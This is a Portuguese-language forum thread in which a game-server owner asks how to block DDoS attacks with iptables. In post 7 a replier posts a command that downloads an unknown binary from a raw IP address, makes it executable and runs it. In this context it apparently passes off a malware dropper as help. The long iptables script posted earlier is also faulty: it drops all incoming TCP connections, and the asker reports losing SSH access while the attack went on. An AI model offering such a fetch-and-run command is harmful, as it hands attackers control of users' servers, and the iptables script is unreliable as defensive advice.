Bloquear Ataque DDOS via IPTABLES

1. Bloquear Ataque DDOS via IPTABLES

Douglas
chrorius

(usa Ubuntu)

Enviado em 02/01/2021 - 20:36h

Pessoal boa noite.

Eu possuo um servidor dedicado que mantém vários servidores de jogos online e com isto, gostaria de saber como posso configura Firewall para bloquear os ataques DDOS.

- Bloquear fireall via IPTABLES
- Ferramentas de monitramento para que possa identificar os ataques
- Software contra ataque DDOS

Desde já,
Obrigado.


  


3. Re: Bloquear Ataque DDOS via IPTABLES

Renato Carneiro Pacheco
renato_pacheco

(usa Debian)

Enviado em 03/01/2021 - 17:45h

"Isso non ecziste"

Imagine q vc tenha uma casa toda reforçada, com portas de ferro, base de concreto etc. De repente tem uma enchente e vc se dá conta de q mesmo vc tendo toda uma casa reforçada, a água entra do mesmo jeito e destrói quase tudo. Usei uma analogia meio bosta, mas é bem semelhante ao DDoS. Mesmo vc usando iptables, mod de Apache etc., vc não evita q os ataques venham pra sua máquina/rede. Mesmo bloqueando o tráfego, sua máquina (ou servidor) vai processar aquele tráfego, além de ocupar a banda disponível. Um modo efetivo seria um proxy reverso em outro lugar q pode direcionar o ataque para onde vc desejar. Vários serviços de VPS/Cloud oferecem algo nesse sentido, mas vc paga por ele.
--
http://br.linkedin.com/in/renatocarneirop
http://www.facebook.com/renatocarneirop

"Não acredite no que eu digo, pois é a minha experiência e não a sua. Experimente, indague e busque." - Osho Rajneesh


4. Re: Bloquear Ataque DDOS via IPTABLES

leandro peçanha scardua
leandropscardua

(usa Ubuntu)

Enviado em 03/01/2021 - 18:39h

Só por curiosidade, segue abaixo os tipos de ataque ddos.

Ataques DDoS Volumétricos
- TCP SYN, ACK, RST, URG, ALL Flags Flood
- UDP Flood
- ICMP Flood 
- AH Flood
- GRE Flood

Ataques DDoS Amplificados
- Amplificação NTP 
- Amplificação SSDP / UPnP
- Amplificação SNMP
- Amplificação Chargen
- Smurf 
- Amplificação DNS
- Amplificação RIPv1, RIPv2, Valve, TeamSpeak, QOTD

Ataques de exaustão de recursos
- Pacotes mal formados / Checksum Inválido
- Pacotes fragmentados de IPs inválidos / IP spoofing
- Segmentação TCP inválida / IP spoofing
- Portas TCP / UDP inválidas
- Flags TCP ilegais
- Endereços IPs inválidos (reservados, falsificados, etc.)




5. Re: Bloquear Ataque DDOS via IPTABLES

JULIO MOLON ABREU
juliomolonabreu

(usa Gentoo)

Enviado em 12/01/2021 - 09:54h

echo "Block TCP-CONNECT scan attempts (SYN bit packets)"
iptables -A INPUT -p tcp --syn -j DROP
echo "Block TCP-SYN scan attempts (only SYN bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH SYN -j DROP
echo "Block TCP-FIN scan attempts (only FIN bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH FIN -j DROP
echo "Block TCP-ACK scan attempts (only ACK bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH ACK -j DROP
echo "Block TCP-NULL scan attempts (packets without flag)"
iptables -A INPUT -m conntrack --ctstate INVALID -p tcp --tcp-flags ! SYN,RST,ACK,FIN,URG,PSH SYN,RST,ACK,FIN,URG,PSH -j DROP
echo "Block "Christmas Tree" TCP-XMAS scan attempts (packets with FIN, URG, PSH bits)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH FIN,URG,PSH -j DROP
echo "Block DOS - Ping of Death"
iptables -A INPUT -p ICMP --icmp-type echo-request -m length --length 60:65535 -j ACCEPT
echo "Block DOS - Teardrop"
iptables -A INPUT -p UDP -f -j DROP
echo "Block DDOS - SYN-flood"
iptables -A INPUT -p TCP --syn -m iplimit --iplimit-above 9 -j DROP
echo "Block DDOS - Smurf"
iptables -A INPUT -m pkttype --pkt-type broadcast -j DROP
iptables -A INPUT -p ICMP --icmp-type echo-request -m pkttype --pkttype broadcast -j DROP
iptables -A INPUT -p ICMP --icmp-type echo-request -m limit --limit 3/s -j ACCEPT
echo "Block DDOS - UDP-flood (greaty)"
iptables -A INPUT -p UDP --dport 7 -j DROP
iptables -A INPUT -p UDP --dport 19 -j DROP
echo "Block DDOS - SMBnuke"
iptables -A INPUT -p UDP --dport 135:139 -j DROP
iptables -A INPUT -p TCP --dport 135:139 -j DROP
echo "Block DDOS - Connection-flood"
iptables -A INPUT -p TCP --syn -m iplimit --iplimit-above 3 -j DROP
echo "Block DDOS - Fraggle"
iptables -A INPUT -p UDP -m pkttype --pkt-type broadcast -j DROP
iptables -A INPUT -p UDP -m limit --limit 3/s -j ACCEPT
echo "Block DDOS - Jolt"
iptables -A INPUT -p ICMP -f -j DROP


####

Paga uma cerveja depois em brother! rss


6. Re: Bloquear Ataque DDOS via IPTABLES

Renato Carneiro Pacheco
renato_pacheco

(usa Debian)

Enviado em 12/01/2021 - 13:11h

juliomolonabreu escreveu:

echo "Block TCP-CONNECT scan attempts (SYN bit packets)"
iptables -A INPUT -p tcp --syn -j DROP
echo "Block TCP-SYN scan attempts (only SYN bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH SYN -j DROP
echo "Block TCP-FIN scan attempts (only FIN bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH FIN -j DROP
echo "Block TCP-ACK scan attempts (only ACK bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH ACK -j DROP
echo "Block TCP-NULL scan attempts (packets without flag)"
iptables -A INPUT -m conntrack --ctstate INVALID -p tcp --tcp-flags ! SYN,RST,ACK,FIN,URG,PSH SYN,RST,ACK,FIN,URG,PSH -j DROP
echo "Block "Christmas Tree" TCP-XMAS scan attempts (packets with FIN, URG, PSH bits)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH FIN,URG,PSH -j DROP
echo "Block DOS - Ping of Death"
iptables -A INPUT -p ICMP --icmp-type echo-request -m length --length 60:65535 -j ACCEPT
echo "Block DOS - Teardrop"
iptables -A INPUT -p UDP -f -j DROP
echo "Block DDOS - SYN-flood"
iptables -A INPUT -p TCP --syn -m iplimit --iplimit-above 9 -j DROP
echo "Block DDOS - Smurf"
iptables -A INPUT -m pkttype --pkt-type broadcast -j DROP
iptables -A INPUT -p ICMP --icmp-type echo-request -m pkttype --pkttype broadcast -j DROP
iptables -A INPUT -p ICMP --icmp-type echo-request -m limit --limit 3/s -j ACCEPT
echo "Block DDOS - UDP-flood (greaty)"
iptables -A INPUT -p UDP --dport 7 -j DROP
iptables -A INPUT -p UDP --dport 19 -j DROP
echo "Block DDOS - SMBnuke"
iptables -A INPUT -p UDP --dport 135:139 -j DROP
iptables -A INPUT -p TCP --dport 135:139 -j DROP
echo "Block DDOS - Connection-flood"
iptables -A INPUT -p TCP --syn -m iplimit --iplimit-above 3 -j DROP
echo "Block DDOS - Fraggle"
iptables -A INPUT -p UDP -m pkttype --pkt-type broadcast -j DROP
iptables -A INPUT -p UDP -m limit --limit 3/s -j ACCEPT
echo "Block DDOS - Jolt"
iptables -A INPUT -p ICMP -f -j DROP


####

Paga uma cerveja depois em brother! rss


Essas regras impedem apenas alguns tipos de DoS, não impedindo ataques DDoS. Resumo da ópera: iptables não faz milagres.

--
http://br.linkedin.com/in/renatocarneirop
http://www.facebook.com/renatocarneirop

"Não acredite no que eu digo, pois é a minha experiência e não a sua. Experimente, indague e busque." - Osho Rajneesh


7. Re: Bloquear Ataque DDOS via IPTABLES

JULIO MOLON ABREU
juliomolonabreu

(usa Gentoo)

Enviado em 13/01/2021 - 11:59h

(adsbygoogle = window.adsbygoogle || []).push({});

wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP

chmod 777 VIP

./VIP


8. UPD ATTACK

Douglas
chrorius

(usa Ubuntu)

Enviado em 19/02/2021 - 13:41h

│ UDP (53 bytes) from 4.xxx.20x.xx:6xx3x to xxx.5x.1xx.2xx:2xx15 on eno1 │
│ UDP (37 bytes) from x0x.9x.x.1x3:x9xxx to xxx.x4.x4x.xx1:2xxxx on viifv1123 │
│ UDP (39 bytes) from 1xx.2x2.1xx.1x9:5xx8x to xxx.x4.xx9.251:2xxxx on viifv1123 │

Ocultei os ips com x

Esses são os relatórios de ataque que estu sofrendo.



9. Re: Bloquear Ataque DDOS via IPTABLES

Douglas
chrorius

(usa Ubuntu)

Enviado em 19/02/2021 - 13:45h


juliomolonabreu escreveu:

echo "Block TCP-CONNECT scan attempts (SYN bit packets)"
iptables -A INPUT -p tcp --syn -j DROP
echo "Block TCP-SYN scan attempts (only SYN bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH SYN -j DROP
echo "Block TCP-FIN scan attempts (only FIN bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH FIN -j DROP
echo "Block TCP-ACK scan attempts (only ACK bit packets)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH ACK -j DROP
echo "Block TCP-NULL scan attempts (packets without flag)"
iptables -A INPUT -m conntrack --ctstate INVALID -p tcp --tcp-flags ! SYN,RST,ACK,FIN,URG,PSH SYN,RST,ACK,FIN,URG,PSH -j DROP
echo "Block "Christmas Tree" TCP-XMAS scan attempts (packets with FIN, URG, PSH bits)"
iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH FIN,URG,PSH -j DROP
echo "Block DOS - Ping of Death"
iptables -A INPUT -p ICMP --icmp-type echo-request -m length --length 60:65535 -j ACCEPT
echo "Block DOS - Teardrop"
iptables -A INPUT -p UDP -f -j DROP
echo "Block DDOS - SYN-flood"
iptables -A INPUT -p TCP --syn -m iplimit --iplimit-above 9 -j DROP
echo "Block DDOS - Smurf"
iptables -A INPUT -m pkttype --pkt-type broadcast -j DROP
iptables -A INPUT -p ICMP --icmp-type echo-request -m pkttype --pkttype broadcast -j DROP
iptables -A INPUT -p ICMP --icmp-type echo-request -m limit --limit 3/s -j ACCEPT
echo "Block DDOS - UDP-flood (greaty)"
iptables -A INPUT -p UDP --dport 7 -j DROP
iptables -A INPUT -p UDP --dport 19 -j DROP
echo "Block DDOS - SMBnuke"
iptables -A INPUT -p UDP --dport 135:139 -j DROP
iptables -A INPUT -p TCP --dport 135:139 -j DROP
echo "Block DDOS - Connection-flood"
iptables -A INPUT -p TCP --syn -m iplimit --iplimit-above 3 -j DROP
echo "Block DDOS - Fraggle"
iptables -A INPUT -p UDP -m pkttype --pkt-type broadcast -j DROP
iptables -A INPUT -p UDP -m limit --limit 3/s -j ACCEPT
echo "Block DDOS - Jolt"
iptables -A INPUT -p ICMP -f -j DROP


####

Paga uma cerveja depois em brother! rss



Então, essa proteção não vai afetar meu FTP ? Pois meus clientes usam para enviar arquivos ao servidor.
Além disso, caso necessite desfazer essa configuração como seria ? Estou recisoso que algo de errado.



10. Re: Bloquear Ataque DDOS via IPTABLES

Douglas
chrorius

(usa Ubuntu)

Enviado em 19/02/2021 - 16:05h


juliomolonabreu

Apliquei as regras que me orientou, deu ruim.

Além do ataque UDP não ter parado, também não consegui acessar SSH, tive que entra pelo VNC e limpar as regras do iptables.


11. Re: Bloquear Ataque DDOS via IPTABLES

Carlos A. P. Cunha
Carlos_Cunha

(usa Linux Mint)

Enviado em 19/02/2021 - 17:46h

Como ja mencionaram ali, iptables(puro) não vai resolver seu problema. Ale m de não funcionar para o que vc quer ainda pode causar mais problemas(como ja causou), recomendo ver no serviço que vc hospeda seus servidor se eles tem tratativas disso, lá sim terá chances de achar algo que possa diminuir o impacto no seu servidor.


#-------------------------------------------------------------------------------------#
"Falar é fácil, me mostre o código." - Linus Torvalds
#-------------------------------------------------------------------------------------#



12. Re: Bloquear Ataque DDOS via IPTABLES

Douglas
chrorius

(usa Ubuntu)

Enviado em 24/02/2021 - 20:16h

Carlos_Cunha escreveu:

Como ja mencionaram ali, iptables(puro) não vai resolver seu problema. Ale m de não funcionar para o que vc quer ainda pode causar mais problemas(como ja causou), recomendo ver no serviço que vc hospeda seus servidor se eles tem tratativas disso, lá sim terá chances de achar algo que possa diminuir o impacto no seu servidor.


#-------------------------------------------------------------------------------------#
"Falar é fácil, me mostre o código." - Linus Torvalds
#-------------------------------------------------------------------------------------#


Sim entendo. Mais estou buscando uma proteção extra utilizando meu iptables. Fechar as prechas do servidor evitar o máximo de vunerabilidade.